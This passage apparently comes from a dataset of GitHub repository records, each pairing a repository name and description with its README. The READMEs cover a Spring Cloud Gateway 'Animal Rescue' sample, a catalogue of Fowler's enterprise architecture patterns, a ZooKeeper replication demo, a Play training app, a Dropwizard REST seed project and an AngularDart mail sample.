- Circuit breaker filter
- OpenAPI route conversion
- OpenAPI auto generation

![architecture](./docs/images/animal-rescue-arch.png)

## Table of Contents

* [Deploy to Kubernetes](#deploy-to-kubernetes)
* [Deploy to Tanzu Application Service](#deploy-to-tanzu-application-service)
* [Special frontend config related to gateway](#special-frontend-config-related-to-gateway)
* [Gateway and Animal Rescue application features](#gateway-and-animal-rescue-application-features)
* [OpenAPI Generation and Route Conversion](#openapi-generation-and-route-conversion-features)
* [Development](#development)

## Deploy to Kubernetes

The Kubernetes deployment requires you to install [kustomize](https://kustomize.io/). You will also need to install [Spring Cloud Gateway for Kubernetes](https://network.pivotal.io/products/spring-cloud-gateway-for-kubernetes) successfully onto your target Kubernetes cluster.

### Configure Single Sign-On (SSO)

For information on configuring Okta as the SSO provider, see [this tutorial](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.0/scg-k8s/GUID-guides-sso-okta-tutorial.html).
For the Animal Rescue sample Single Sign-On (SSO) to work, you will need to create two text files that will be used to create Kubernetes secrets:

* ./backend/secrets/sso-credentials.txt
* ./gateway/sso-secret-for-gateway/secrets/test-sso-credentials.txt

Before you start, and for validation, please locate the JWKS endpoint info from your SSO identity provider. The endpoint typically exists at:

```
https://YOUR_DOMAIN/.well-known/openid-configuration
```

For example, when using Okta the configured Issuer URI and JWKS URI can be retrieved at:

```
https://<issuer-uri>/.well-known/openid-configuration

$ curl https://dev-1234567.okta.com/oauth2/abcd12345/.well-known/openid-configuration
{
  "issuer": "https://dev-1234567.okta.com/oauth2/abcd12345",
  ...
  "jwk-set-uri": "https://dev-1234567.okta.com/oauth2/abcd12345/v1/keys",
  ...

# Please note that the format used by Okta is jwk-set-uri="<issuer-uri>/v1/keys"
```

For example, the contents of the `./backend/secrets/sso-credentials.txt` file would be the following:

```
jwk-set-uri=https://dev-1234567.okta.com/oauth2/abcd12345/v1/keys
```

The contents of the `./gateway/sso-secret-for-gateway/secrets/test-sso-credentials.txt` file include the following values from your OpenID Connect (OIDC) compliant SSO identity provider:

```
scope=openid,profile,email
client-id={your_client_id}
client-secret={your_client_secret}
issuer-uri={your_issuer_uri}
```

### Configure Ingress

The K8s deploy leverages an Ingress object to easily expose your application outside of the cluster. Before starting, confirm that you have an ingress controller installed into your cluster. [Contour](https://projectcontour.io/) is a good choice if you don't already have a favorite.

Next, edit `gateway/gateway-demo.yaml` to set the domain to your domain. If you don't have a domain that you can use, leveraging [`nip.io`](https://nip.io/) is a good choice.
**Important** Once you have your domain, remember to configure it as an accepted `redirect_uri` in your SSO provider. Otherwise, application login will fail.

### Deploy with Kustomize (recommended)

Assuming you are authenticated against the target Kubernetes cluster, you can run the following command from the top-level directory in the repository:

```bash
kustomize build . | kubectl apply -f -
```

This will create a namespace named `animal-rescue`, create a new gateway instance named `gateway-demo` in that namespace, deploy the frontend and backend Animal Rescue applications, and finally apply the application-specific API route configurations to `gateway-demo`.

### Deploy with Kubectl

If you don't want to use `kustomize`, you can apply each yaml file in the [`kustomization.yaml`](kustomization.yaml) file manually into the `animal-rescue` namespace (or any namespace you prefer), as well as create the `sso-credentials` secret from `backend/secrets/sso-credentials.txt` and the `animal-rescue-sso` secret from `gateway/sso-secret-for-gateway/secrets/test-sso-credentials.txt`. Make sure to create the SSO credentials secret in the SCG installation namespace (`spring-cloud-gateway` by default).

The gateway instance created, named `gateway-demo`, doesn't have any API routes defined initially. Once the API route definitions defined in `SpringCloudGatewayRouteConfig` objects are mapped to `gateway-demo` using the `SpringCloudGatewayMapping` objects, you will see the routes added to the gateway.

### Accessing Animal Rescue Site

After deploying Animal Rescue, there will be an Ingress created. You can then access Animal Rescue at the URL set by the Ingress created in `gateway/gateway-demo.yaml`. For example, `http://animal-rescue.my.domain.io/rescue`.
## Deploy to Tanzu Application Service

Run the following scripts to set up everything:

```bash
./scripts/cf_deploy init   # installs dependencies and builds the deployment artifact
./scripts/cf_deploy deploy # handles everything you need to deploy the frontend, backend, and gateway. This script can be executed repeatedly to deploy new changes.
```

Then visit the frontend url `https://gateway-demo.${appsDomain}/rescue` to view the sample app.

Once you have had enough fun with the sample app, run the following script to clean up the environment:

```bash
./scripts/cf_deploy destroy # tears down everything
```

Some other commands that might be helpful:

```bash
./scripts/cf_deploy push                        # builds and pushes frontend and backend
./scripts/cf_deploy dynamic_route_config_update # update bound apps' configuration by calling the update endpoint on the backing app. You will need to be a space developer to do so.
./scripts/cf_deploy rebind                      # unbinds and rebinds frontend and backend
./scripts/cf_deploy upgrade                     # upgrade the gateway instance
```

All the gateway configuration can be found and updated here:

- Gateway service instance configuration file used on create/update: `./api-gateway-config.json`
- Frontend routes configuration used on bind: `./frontend/api-route-config.json`
- Backend routes configuration used on bind: `./backend/api-route-config.json`

## Special frontend config related to gateway

The frontend application is implemented in ReactJS and is pushed with the static buildpack. Because of its static nature, we had to do the following:

1. `homepage` in `package.json` is set to `/rescue`, which is the path we set for the frontend application in the gateway config (`frontend/api-route-config.json`). This is to make sure all related assets are requested under the `/rescue` path as well.
1. The `Sign in to adopt` button is linked to `/rescue/login`, which is a path that is `sso-enabled` in the gateway config (`frontend/api-route-config.json`).
This is necessary for frontend apps bound to a sub path on the gateway, because the OAuth2 login flow redirects users to the originally requested location, or back to `/` if no saved request exists. This setting is not necessary if the frontend app is bound to path `/`.
1. `REACT_APP_BACKEND_BASE_URI` is set to `/backend` in the build script, which is the path we set for the backend application in the gateway config (`backend/api-route-config.json`). This is to make sure all our backend API calls are prefixed with the `backend` path.

## Gateway and Animal Rescue application features

Visit `https://gateway-demo.${appsDomain}/rescue`; you should see cute animal bios with the `Adopt` buttons disabled. All the information is fetched from a public `GET` backend endpoint, `/animals`.

![homepage](./docs/images/homepage.png)

Click the `Sign in to adopt` button in the top right corner; you should be redirected to the SSO login page if you haven't already logged in to SSO.

![log in page](./docs/images/login.png)

Once you have logged in, you should see a greeting with the username you logged in with in the top right corner, and the `Adopt` buttons should be enabled.

![logged in view](./docs/images/logged-in.png)

Click on the `Adopt` button and input your contact email and application notes in the modal, then click `Apply`. A `POST` request should be sent to an `sso-enabled` backend endpoint, `/animals/{id}/adoption-requests`, with the adopter set to the username we parsed from your token.

![adopt modal](./docs/images/adopt.png)

Then the modal should close, and you should see that the `Adopt` button you clicked just now has turned into `Edit Adoption Request`. This is matched by your SSO login username.

![adopted view](./docs/images/adopted.png)

Click on `Edit Adoption Request` again; you can view, edit (`PUT`), and delete (`DELETE`) the existing request.

![view or edit existing adoption request modal](./docs/images/edit-or-delete.png)

**Note** Documentation may get out of date.
Please refer to the [e2e test](./e2e/cypress/integration/) and the test output video for the most accurate user flow description.

To see the circuit breaker filter in action, stop the `animal-rescue-frontend` application and refresh the page. You should see a response from the `https://example.org` website; this is configured in the `api-route-config.json` file in the `/fallback` route.

## OpenAPI Generation and Route conversion features

### Route Conversion

The Spring Cloud Gateway Operator offers an OpenAPI Route Conversion Service that can be used to automate the creation of a `SpringCloudGatewayRouteConfig` based off an OpenAPI document (v2 or v3). The full details of this service can be [found here](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.1/scg-k8s/GUID-guides-openapi-route-conversion.html), but you will find an example below of how it was used in animal rescue.

The animal rescue backend exposes an OpenAPI v3 document at `/api-docs`, which is auto-generated using the [springdoc](https://springdoc.org/) library. The `SpringCloudGatewayRouteConfig` for the animal rescue backend, which can be found in `/backend/k8s/animal-rescue-backend-route-config.json`, was generated using the OpenAPI Route Conversion Service by pointing it to that OpenAPI document. The full command that was used to generate it can be found below.

**Note:** In the example the Spring Cloud Gateway Operator pod has been port forwarded to port 5566.
```commandline
curl --request POST 'http://localhost:5566/api/convert/openapi' \
--header 'Content-Type: application/json' \
--data-raw '{
    "service": {
        "namespace": "animal-rescue",
        "name": "animal-rescue-backend",
        "ssoEnabled": true,
        "filters": ["RateLimit=10,2s"]
    },
    "openapi": {
        "location": "/api-docs"
    },
    "routes": [
        {
            "predicates": ["Method=GET","Path=/animals"],
            "filters": [],
            "ssoEnabled": false
        },
        {
            "predicates": ["Method=GET,PUT,POST,DELETE","Path=/**"],
            "filters": [],
            "tokenRelay": true
        },
        {
            "predicates": ["Method=GET,PUT,PATCH,POST,DELETE","Path=/actuator/**"],
            "filters": [],
            "ssoEnabled": false
        }
    ]
}' | sed 's/Path=/Path=\/api/g' \
  | sed 's/"animal-rescue-backend"/"animal-rescue-backend-route-config"/'
```

The full details of how the service works can be [found here](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.1/scg-k8s/GUID-guides-openapi-route-conversion.html), but below you will find a brief summary of what the above command does.

- Specifies the namespace/name of the service that fronts the animal rescue backend and provides the path to the OpenAPI document.
- Specifies some filters at the service level that should be applied to all routes.
- Specifies some exceptions to the service-level filters at the individual route level
  - i.e., we turn off SSO for the endpoint that gets all animals as well as the actuator endpoints.
- We use sed to append the path '/api' to all the paths, since that is how we want to expose the urls to the outside world.
  - Note that by default the operator will add a `StripPrefix=1` to every route, which is why we don't explicitly have to add that filter here.
- We use sed to change the default name for the generated `SpringCloudGatewayRouteConfig`. By default, it will give it the name of the service, but for consistency with the other examples in this project we append "-route-config" to the name.
### OpenAPI Generation

Spring Cloud Gateway for Kubernetes also offers a service to generate OpenAPI v3-compliant documentation for the gateways that it manages. When combined with the Route Conversion Service mentioned above, this can be a powerful way to expose the details of your APIs to their consumers. By default, the service will return an array of all the OpenAPI documents of the gateways it manages. There are options, however, to restrict the documents that are retrieved. The full details of this feature can be [found here](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.1/scg-k8s/GUID-guides-openapi-generation.html), but below you will find some details on how it can be used with animal rescue.

One option is to limit the results to a single OpenAPI document for a specific gateway. You can do this by using the **namespace** and **name** of that gateway as part of the path. For example, if you are port forwarding the `scg-openapi-service` to port 5566, you could get the OpenAPI document specific to the `gateway-demo` with the following curl call:

```commandline
curl http://localhost:5566/openapi/animal-rescue/gateway-demo
```

One thing you might notice with the call above is that the returned OpenAPI document only has routes for the animal rescue backend, even though the `gateway-demo` also has a `SpringCloudGatewayRouteDefinition` for the frontend (`frontend/k8s/animal-rescue-frontend-route-config.yaml`). The reason for this is that the OpenAPI Generation provides the ability to control which of your routes will show up in the generated document. In the case of animal rescue, the OpenAPI generation is turned off for everything in the route config by setting `spec.openapi.generation.enabled=false` (see example below). You also have the ability to control it at the route level with `spec.routes.openapi.generation.enabled`.
The full details can be [found here](https://docs.vmware.com/en/VMware-Spring-Cloud-Gateway-for-Kubernetes/2.1/scg-k8s/GUID-guides-openapi-generation.html).

```commandline
spec:
  service:
    name: animal-rescue-frontend
    ssoEnabled: false
  openapi:
    generation:
      enabled: false
```

## Development

### Run locally

Use the following commands to manage the local lifecycle of animal-rescue:

```bash
./scripts/local.sh start         # start auth server, frontend app, and backend app
./scripts/local.sh start --quiet # start everything without launching the app in browser, and redirects all output to `./scripts/out/`
./scripts/local.sh stop          # stop auth server, frontend app, and backend app. You would only need to do this if you start the app in quiet mode.
```

### Local security configuration

The backend uses form login for local development, with two test accounts - `alice / test` and `bob / test`. Note that in a real deployment with Gateway, OAuth2 login will be managed by the gateway itself, and your app should use the `TokenRelay` filter to receive the OpenID ID Token in the `Authorization` header. See the `CloudFoundrySecurityConfiguration` class for an example of Spring Security 5 configuration to handle token relay correctly.

> It is also possible to use the OAuth2 login flow for the app. This requires running an authorization server locally. See `local-oauth2-flow` for an example of using Cloud Foundry User Account and Authentication (UAA) running in a Docker container locally.

### Tests

Execute the following script to run all tests:

```bash
./scripts/local.sh init        # install dependencies for the frontend folder and the e2e folder
./scripts/local.sh ci          # run backend tests and e2e tests
./scripts/local.sh backend     # run backend test only
./scripts/local.sh e2e --quiet # run e2e test only without interactive mode
```

You can find an e2e test output video showing the whole journey in `./e2e/cypress/videos/` after the test run.
If you would like to launch the test in an actual browser and run the e2e test interactively, you may run the following commands:

```bash
./scripts/local.sh start
./scripts/local.sh e2e
```

More detail about the e2e testing framework can be found in the [cypress api doc](https://docs.cypress.io/api/api/table-of-contents.html).

### CI

#### GitHub Actions

GitHub Actions run all checks for the `main` branch and all PR requests. All workflow configuration can be found in `.github/workflows`.

#### Concourse

If you'd like to get the most updated sample app deployed in a real TAS environment, you can set up a Concourse pipeline to do so:

```bash
fly -t ${yourConcourseTeamName} set-pipeline -p sample-app-to-demo-environment -c concourse/pipeline.yml -l config.yml
```

You will need to update the Slack notification settings and add the following environment variables to your Concourse credentials manager. Here are the variables we set in our Concourse credhub:

```
- name: /concourse/main/sample-app-to-demo-environment/CF_API_HOST
- name: /concourse/main/sample-app-to-demo-environment/CF_USERNAME
- name: /concourse/main/sample-app-to-demo-environment/CF_PASSWORD
- name: /concourse/main/sample-app-to-demo-environment/SKIP_SSL_VALIDATION
- name: /concourse/main/sample-app-to-demo-environment/CF_ORG
- name: /concourse/main/sample-app-to-demo-environment/CF_SPACE
```

## Check out our tags

Tags that look like `SCG-VT-v${VERSION}+` indicate that this commit and the commits after are compatible with the specified `VERSION` of the `SCG-VT` tile. The other tags demonstrate different configurations with `SCG-VT`; have fun exploring what's possible!
1
jaysonzanarias/patterns-of-enterprise-application-architecture
Compilation of sample code from the book Patterns of Enterprise Application Architecture by Martin Fowler.
null
# Patterns of Enterprise Application Architecture

Compilation of sample code from the book Patterns of Enterprise Application Architecture by Martin Fowler. I created this repo while studying the book. Well worth reading! Read the book and learn more on each topic. Enjoy! :)

## Layering

- Presentation
- Domain Logic
- Data Source

## Patterns

[Domain Logic Patterns](#DomainLogicPatterns)
- Transaction Script
- Domain Model
- Table Module
- Service Layer

[Data Source Patterns](#DataSourcePatterns)
- Table Data Gateway
- Row Data Gateway
- Active Records
- Data Mapper

[Object-Relational Behavior Patterns](#ObjectRelationalBehaviorPatterns)
- Unit of Work
- Identity Map
- Lazy Load

[Object-Relational Structural Patterns](#ObjectRelationalStructuralPatterns)
- Identity Field
- Foreign Key Mapping
- Association Table Mapping
- Dependent Mapping
- Embedded Value
- Serialized LOB
- Single Table Inheritance
- Class Table Inheritance
- Concrete Table Inheritance
- Inheritance Mappers

[Object-Relational Metadata Mapping Patterns](#ObjectRelationalMetadataMappingPatterns)
- Metadata Mapping
- Query Object
- Repository

[Web Presentation Patterns](#WebPresentationPatterns)
- Model View Controller
- Page Controller
- Front Controller
- Template View
- Transform View
- Two Step View
- Application Controller

[Distribution Patterns](#DistributionPatterns)
- Remote Facade
- Data Transfer Object

[Offline Concurrency Patterns](#OfflineConcurrencyPatterns)
- Optimistic Offline Lock
- Pessimistic Offline Lock
- Coarse-Grained Lock
- Implicit Lock

[Session State Patterns](#SessionStatePatterns)
- Client Session State
- Server Session State
- Database Session State

[Base Patterns](#BasePatterns)
- Gateway
- Mapper
- Layer Supertype
- Separated Interface
- Registry
- Value Object
- Money
- Special Case
- Plugin
- Service Stub
- Record Set

## Details

<a name="DomainLogicPatterns"/>

**Domain Logic Patterns**

- Transaction Script
  > Organizes business logic by procedures where each
procedure handles a single request from the presentation.
  <br>![Screenshot](images/TransactionScript.jpg)
- Domain Model
  > An object model of the domain that incorporates both behavior and data.
  <br>![Screenshot](images/DomainModel.jpg)
- Table Module
  > A single instance that handles the business logic for all rows in a database table or view.
  <br>![Screenshot](images/TableModule.jpg)
- Service Layer
  > Defines an application's boundary with a layer of services that establishes a set of available operations and coordinates the application's response in each operation.
  <br>![Screenshot](images/ServiceLayer.png)

<a name="DataSourcePatterns"/>

**Data Source Patterns**

- Table Data Gateway
  > An object that acts as a Gateway to a database table. One instance handles all the rows in the table.
  <br>![Screenshot](images/TableDataGateway.png)
- Row Data Gateway
  > An object that acts as a Gateway to a single record in a data source. There is one instance per row.
  <br>![Screenshot](images/RowDataGateway.png)
- Active Records
  > An object that wraps a row in a database table or view, encapsulates the database access, and adds domain logic on that data.
  <br>![Screenshot](images/ActiveRecords.png)
- Data Mapper
  > A layer of Mappers that moves data between objects and a database while keeping them independent of each other and the mapper itself.
  <br>![Screenshot](images/DataMapper.png)

<a name="ObjectRelationalBehaviorPatterns"/>

**Object-Relational Behavior Patterns**

- Unit of Work
  > Maintains a list of objects affected by a business transaction and coordinates the writing out of changes and the resolution of concurrency problems.
  <br>![Screenshot](images/UnitOfWork.png)
- Identity Map
  > Ensures that each object gets loaded only once by keeping every loaded object in a map. Looks up objects using the map when referring to them.
  <br>![Screenshot](images/IdentityMap.png)
- Lazy Load
  > An object that doesn't contain all of the data you need but knows how to get it.
<br>![Screenshot](images/LazyLoad.png) - Types: - Lazy Initialization - Virtual Proxy - Value Holder - Ghost <a name="ObjectRelationalStructuralPatterns"/> **Object-Relational Structural Patterns** - Identity Field > Saves a database ID field in an object to maintain identity between an in-memory object and a database row. <br>![Screenshot](images/IdentityField.png) - Types: - Integral - Key Table - Compound Key - Foreign Key Mapping > Maps an association between objects to a foreign key reference between tables. <br>![Screenshot](images/ForeignKeyMapping.png) - Types: - Single-Valued Reference - Multi Table Find - Collection of References - Association Table Mapping > Saves an association as a table with foreign keys to the tables that are linked by the association. <br>![Screenshot](images/AssociationTableMapping.png) - Dependent Mapping > Has one class perform the database mapping for a child class. <br>![Screenshot](images/DependentMapping.png) - Embedded Value > Maps an object into several fields of another object’s table. <br>![Screenshot](images/EmbeddedValue.png) - Serialized LOB > Saves a graph of objects by serializing them into a single large object (LOB), which it stores in a database field. <br>![Screenshot](images/SerializedLOB.png) - Single Table Inheritance > Represents an inheritance hierarchy of classes as a single table that has columns for all the fields of the various classes. <br>![Screenshot](images/SingleTableInheritance.png) - Class Table Inheritance > Represents an inheritance hierarchy of classes with one table for each class. <br>![Screenshot](images/ClassTableInheritance.png) - Concrete Table Inheritance > Represents an inheritance hierarchy of classes with one table per concrete class in the hierarchy. <br>![Screenshot](images/ConcreteTableInheritance.png) - Inheritance Mappers > A structure to organize database mappers that handle inheritance hierarchies. 
<br>![Screenshot](images/InheritanceMappers.png) <a name="ObjectRelationalMetadataMappingPatterns"/> **Object-Relational Metadata Mapping Patterns** - Metadata Mapping > Holds details of object-relational mapping in metadata. <br>![Screenshot](images/MetadataMapping.png) - Query Object > An object that represents a database query. <br>![Screenshot](images/QueryObject.png) - Repository > Mediates between the domain and data mapping layers using a collection-like interface for accessing domain objects. <br>![Screenshot](images/Repository.png) <a name="WebPresentationPatterns"/> **Web Presentation Patterns** - Model View Controller > Splits user interface interaction into three distinct roles. <br>![Screenshot](images/ModelViewController.png) - Page Controller > An object that handles a request for a specific page or action on a Web site. <br>![Screenshot](images/PageController.png) - Front Controller > A controller that handles all requests for a Web site. <br>![Screenshot](images/FrontController.png) - Template View > Renders information into HTML by embedding markers in an HTML page. <br>![Screenshot](images/TemplateView.png) - Transform View > A view that processes domain data element by element and transforms it into HTML. <br>![Screenshot](images/TransformView.png) - Two Step View > Turns domain data into HTML in two steps: first by forming some kind of logical page, then rendering the logical page into HTML. <br>![Screenshot](images/TwoStepView.png) - Application Controller > A centralized point for handling screen navigation and the flow of an application. <br>![Screenshot](images/ApplicationController.png) <a name="DistributionPatterns"/> **Distribution Patterns** - Remote Facade > Provides a coarse-grained facade on fine-grained objects to improve efficiency over a network. <br>![Screenshot](images/RemoteFacade.png) - Data Transfer Object > An object that carries data between processes in order to reduce the number of method calls. 
<br>![Screenshot](images/DataTransferObject.png) <a name="OfflineConcurrencyPatterns"/> **Offline Concurrency Patterns** - Optimistic Offline Lock > Prevents conflicts between concurrent business transactions by detecting a conflict and rolling back the transaction. <br>![Screenshot](images/OptimisticOfflineLock.png) - Pessimistic Offline Lock > Prevents conflicts between concurrent business transactions by allowing only one business transaction at a time to access data. <br>![Screenshot](images/PessimisticOfflineLock.png) - Coarse-Grained Lock > Locks a set of related objects with a single lock. <br>![Screenshot](images/CoarseGrainedLock.png) - Implicit Lock > Allows framework or layer supertype code to acquire offline locks. <br>![Screenshot](images/ImplicitLock.png) **Session State Patterns** - Client Session State > Stores session state on the client. - Server Session State > Keeps the session state on a server system in a serialized form. - Database Session State > Stores session data as committed data in the database. <a name="BasePatterns"/> **Base Patterns** - Gateway > An object that encapsulates access to an external system or resource. <br>![Screenshot](images/Gateway.png) - Mapper > An object that sets up a communication between two independent objects. <br>![Screenshot](images/Mapper.png) - Layer Supertype > A type that acts as the supertype for all types in its layer. - Separated Interface > Defines an interface in a separate package from its implementation. <br>![Screenshot](images/SeparatedInterface.png) - Registry > A well-known object that other objects can use to find common objects and services. <br>![Screenshot](images/Registry.png) - Value Object > A small simple object, like money or a date range, whose equality isn’t based on identity. - Money > Represents a monetary value. <br>![Screenshot](images/Money.png) - Special Case > A subclass that provides special behavior for particular cases. 
<br>![Screenshot](images/SpecialCase.png) - Plugin > Links classes during configuration rather than compilation. <br>![Screenshot](images/Plugin.png) - Service Stub > Removes dependence upon problematic services during testing. <br>![Screenshot](images/ServiceStub.png) - Record Set > An in-memory representation of tabular data. <br>![Screenshot](images/RecordSet.png) ## Additional References - https://martinfowler.com/eaaCatalog/ - https://www.sourcecodeexamples.net/p/p-of-eaa.html - Lazy Load: Ghost - https://stackoverflow.com/questions/58243839/how-to-implement-lazy-loading-using-ghost-object-in-java
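To give a flavor of the patterns listed above, here is a minimal sketch of the Identity Map pattern in plain Java. The class and field names are hypothetical (they are not taken from this repo's sample code), and the database trip is simulated by a counter; the point is only that repeated lookups of the same id yield the same in-memory instance.

```java
import java.util.HashMap;
import java.util.Map;

// Minimal Identity Map sketch: the map guarantees that each Person id is
// materialized as exactly one in-memory object, however often it is looked up.
public class IdentityMapDemo {

    static class Person {
        final long id;
        Person(long id) { this.id = id; }
    }

    static class PersonIdentityMap {
        private final Map<Long, Person> loaded = new HashMap<>();
        private int databaseHits = 0; // counts simulated trips to the database

        Person find(long id) {
            // Only "load" from the (simulated) database on the first request.
            return loaded.computeIfAbsent(id, key -> {
                databaseHits++;
                return new Person(key);
            });
        }

        int databaseHits() { return databaseHits; }
    }

    public static void main(String[] args) {
        PersonIdentityMap map = new PersonIdentityMap();
        Person first = map.find(42L);
        Person second = map.find(42L);
        System.out.println(first == second);      // true: same instance
        System.out.println(map.databaseHits());   // 1: loaded only once
    }
}
```

A real Identity Map would typically live inside a Unit of Work or a per-session registry, so that a business transaction never sees two copies of the same row.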
1
bkatwal/zookeeper-demo
Sample Distributed system created using spring boot app server and zookeeper as backbone
null
### GitLab
[![build status](https://gitlab.com/bikas.katwal10/zookeeper-demo/badges/master/build.svg)](https://gitlab.com/bikas.katwal10/zookeeper-demo/pipelines)

![alt text](https://github.com/bkatwal/zookeeper-demo/blob/master/ZookeeperDemo.png)

## Key features supported:
- Model a database that is replicated across multiple servers.
- The system should scale horizontally, meaning if any new server instance is added to the cluster, it should have the latest data and start serving update/read requests.
- Data consistency. All update requests will be forwarded to the leader, and then the leader will broadcast data to all active servers and then return the update status.
- Data can be read from any of the replicas without any inconsistencies.
- All servers in the cluster will store the cluster state: information like who the leader is, and server state (list of live/dead servers in the cluster). This info is required by the leader server to broadcast update requests to active servers, and active follower servers need to forward any update request to their leader.
- In the event of a change in the cluster state (leader goes down/any server goes down), all servers in the cluster need to be notified and store the latest change in the local cluster data storage.

## Setup and Usage
1. Install and start Apache Zookeeper on any port. Follow the guide: https://zookeeper.apache.org/doc/r3.1.2/zookeeperStarted.html
2. Use the command below to start the application on 3 ports:
```
java -Dserver.port=8081 -Dzk.url=localhost:2181 -Dleader.algo=2 -jar target/bkatwal-zookeeper-demo-1.0-SNAPSHOT.jar
java -Dserver.port=8082 -Dzk.url=localhost:2181 -Dleader.algo=2 -jar target/bkatwal-zookeeper-demo-1.0-SNAPSHOT.jar
java -Dserver.port=8083 -Dzk.url=localhost:2181 -Dleader.algo=2 -jar target/bkatwal-zookeeper-demo-1.0-SNAPSHOT.jar
```
`server.port` is the Spring app server port, `zk.url` is your zookeeper connection string, and if `leader.algo` is passed as `2`, the application will use ephemeral sequential znodes for leader election; otherwise it will use ephemeral znodes.

#### Look at swagger for API documentation
For API details, access the swagger UI at `/swagger-ui.html`

`GET /clusterInfo` - This API will display all the nodes in the cluster, the current list of live nodes, and the current master.

`GET /persons` - This API will display all the saved Person entries.

`PUT /person/{id}/{name}` - Use this to save person data.
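The ephemeral-sequential election mentioned for `leader.algo=2` follows the standard ZooKeeper leader-election recipe: each server creates a znode with an appended monotonically increasing sequence number, and the server whose znode has the smallest sequence number is the leader. Below is a plain-Java sketch of just that selection rule; the znode names are hypothetical, and a real implementation would read them via ZooKeeper's `getChildren()` and re-evaluate on every watch event.

```java
import java.util.Comparator;
import java.util.List;
import java.util.Optional;

// Selection rule behind ephemeral-sequential leader election:
// the znode whose numeric suffix is smallest wins.
public class LeaderElectionRule {

    // e.g. "server_0000000003" -> 3
    static int sequenceOf(String znodeName) {
        return Integer.parseInt(znodeName.substring(znodeName.lastIndexOf('_') + 1));
    }

    static Optional<String> electLeader(List<String> znodeNames) {
        return znodeNames.stream()
                .min(Comparator.comparingInt(LeaderElectionRule::sequenceOf));
    }

    public static void main(String[] args) {
        List<String> nodes = List.of("server_0000000007", "server_0000000003", "server_0000000005");
        System.out.println(electLeader(nodes).get()); // server_0000000003
    }
}
```

Because the znodes are ephemeral, a crashed leader's znode disappears automatically and the next-smallest sequence number takes over, which is exactly how the cluster survives the "leader goes down" event described above.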
1
typesafehub/playconf
Sample application for the introductory Play/Java online training course
null
PlayConf: Fictitious conference application
===========================================

This application is used as a use case for the **Building Reactive Play Apps** Java course from Typesafe Inc. You can sign up for the course [here](https://typesafe.com/how/online-training)

Here is the outline of the course
---------------------------------

- Introduction
- Lesson 1 – Meet Play
- Lesson 2 – Zero to Deploy
- Lesson 3 – Working with Assets
  - You can download all the assets used in the lesson from [here](https://github.com/typesafehub/playconf/tree/master/assets-used-in-course)
- Lesson 4 – Going Reactive
- Lesson 5 – Using REST Services
- Lesson 6 – Adding Tests
1
oregami/dropwizard-guice-jpa-seed
A sample REST application written in Java (dropwizard, guice, jpa, hibernate, cors and more)
null
[![Build Status](https://travis-ci.org/oregami/dropwizard-guice-jpa-seed.png)](https://travis-ci.org/oregami/dropwizard-guice-jpa-seed)

dropwizard-guice-jpa-seed
=========================

This is a sample REST application written in Java. Its purpose is to create a generic project that can be used as a starting point for a new project, but also for learning efforts (I am building an open game database at www.oregami.org).

- built on [Dropwizard](https://dropwizard.github.io/dropwizard/) version 0.7.0
- dependency injection with [Google Guice](https://code.google.com/p/google-guice/) (no Spring dependencies!)
- [Hibernate](http://hibernate.org/) / JPA 2.1 as database access framework
- [HSQLDB](http://hsqldb.org/) as database
- read database configuration from Dropwizard yaml config file, persistence.xml is not used
- "Session-per-HTTP-request" with Guice [PersistFilter](https://code.google.com/p/google-guice/wiki/JPA)
- support for [cross-origin resource sharing](http://en.wikipedia.org/wiki/Cross-origin_resource_sharing)
- JPA entities with [UUIDs](http://en.wikipedia.org/wiki/Universally_Unique_Identifier) as primary keys
- Auditing/version control of entities with [hibernate envers](http://envers.jboss.org/)
- authentication with JSON Web Token via [dropwizard-auth-jwt](https://github.com/ToastShaman/dropwizard-auth-jwt)
- integration tests with [rest-assured](https://code.google.com/p/rest-assured/)
- a pattern for accessing and manipulating entities with HTTP REST calls (Resource => Service => DAO => entity)
- a pattern for ServiceResult objects which contain ServiceErrorMessages (which can later be bound to web form fields in the client)

**Feel free to suggest corrections, optimizations or extensions via pull requests!**

A corresponding **JavaScript client application (AngularJS)** is available at https://github.com/oregami/angularjs-rest-client/

# system architecture

![](docs/system_architecture.png?raw=true)

# road map / things to do

* more complex entities
* hypermedia / HATEOAS

# Usage

* Start the application with the class "ToDoApplication" with the parameters "server todo.yml".
* List all tasks with: GET => http://localhost:8080/task
* Add a new task with: POST => http://localhost:8080/task
  Header: Content-Type:application/json
  JSON-Body e.g.: {"name" : "task 1", "description" : "This is a description"}
* Modify a task: PUT => http://localhost:8080/task/[id]
  Header: Content-Type:application/json Accept:application/json
  JSON-Body e.g.:
  { "id": "402880944687600101468760d9ea0000", "version": "0", "name": "task 1 with new name", "description": "This is an updated description", "finished": "false" }
* Remove a task: DELETE => http://localhost:8080/task/[id]
* List all revision numbers of a task with: GET => http://localhost:8080/task/[id]/revisions
* Show a single task with: GET => http://localhost:8080/task/[id]
* Show a special revision of a single task with: GET => http://localhost:8080/task/[id]/revisions/[revisionNumber]
* Create JSON Web Token for authentication: POST => http://localhost:8080/jwt/login?username=[username]&password=[password] e.g. with user1/password1 or user2/password2
* Check if your JSON Web Token is valid for authentication: GET => http://localhost:8080/jwt/test
  Authentication-Header: "Bearer [token]"

I recommend you use the great **Chrome extension [Postman](http://getpostman.com)** to make such HTTP calls!

# Data model

see http://wiki.oregami.org/display/DTA/Data+Model
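The "Add a new task" call from the Usage section can also be scripted instead of using Postman. The sketch below builds that request with the JDK's `java.net.http` client (Java 11+); the request is only constructed here, and actually sending it assumes the ToDoApplication is running on localhost:8080.

```java
import java.net.URI;
import java.net.http.HttpRequest;

// Builds the POST http://localhost:8080/task request described in the Usage
// section, with the Content-Type header and example JSON body from the README.
public class CreateTaskRequest {

    static HttpRequest newTask(String name, String description) {
        String json = String.format(
                "{\"name\" : \"%s\", \"description\" : \"%s\"}", name, description);
        return HttpRequest.newBuilder(URI.create("http://localhost:8080/task"))
                .header("Content-Type", "application/json")
                .POST(HttpRequest.BodyPublishers.ofString(json))
                .build();
    }

    public static void main(String[] args) {
        HttpRequest request = newTask("task 1", "This is a description");
        System.out.println(request.method() + " " + request.uri());
        // To actually send it (server must be running):
        // HttpClient.newHttpClient().send(request, HttpResponse.BodyHandlers.ofString());
    }
}
```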
1
isoos/gwt_mail_sample
Migrate the GWT mail sample application to Angular Dart
dart dartlang gwt
# AngularDart Mail Sample App

